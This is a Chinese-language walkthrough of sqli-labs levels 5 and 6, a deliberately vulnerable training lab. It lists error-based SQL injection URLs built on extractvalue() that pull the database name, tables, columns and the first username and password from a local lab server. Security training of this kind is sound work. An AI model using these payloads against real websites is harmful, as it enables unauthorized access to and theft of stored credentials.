sqli-labs第5,6关

sqli-labs第5关

常规思路,上来就测试一波1’,1’-- -,1’ and 1=1-- -,1’ and 1=2-- -;
通过页面返回的内容,可以知道这是一个‘字符型的盲注。
sqli-labs第5,6关_第1张图片
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串).
爆数据库名
http://192.168.1.8/Less-5/?id=1’ and extractvalue(1,concat(0x7e,database(),0x7e))–+
sqli-labs第5,6关_第2张图片
数据库名为security
爆表名:
http://192.168.1.8/Less-5/?id=1’ and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e))–+
这里提一下limit这个函数,limit m,n的意思是,从第m个开始,读取n个数据:
sqli-labs第5,6关_第3张图片
爆列名:
http://192.168.1.8/Less-5/?id=1’ and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1),0x7e))–+

sqli-labs第5,6关_第4张图片
爆数据:
http://192.168.1.8/Less-5/?id=1’ and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))–+
sqli-labs第5,6关_第5张图片
http://192.168.1.8/Less-5/?id=1’ and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))–+
sqli-labs第5,6关_第6张图片
至此,爆出security数据库中user表中的第一行账号密码为Dumb,Dumb。

sqli-labs 第6关

http://192.168.1.8/Less-6/?id=1"的页面如下
sqli-labs第5,6关_第7张图片
http://192.168.1.8/Less-6/?id=1"-- -的页面如下:
sqli-labs第5,6关_第8张图片
因此该URL为"闭合的字符型盲注。
爆数据库名:
http://192.168.1.8/Less-6/?id=1" and extractvalue(1,concat(0x7e,database(),0x7e))–+
sqli-labs第5,6关_第9张图片
第6关与第5关的唯一区别就是采用了"进行闭合,其他步骤与第5关相同,在此不再赘述。

你可能感兴趣的:(sqli-labs)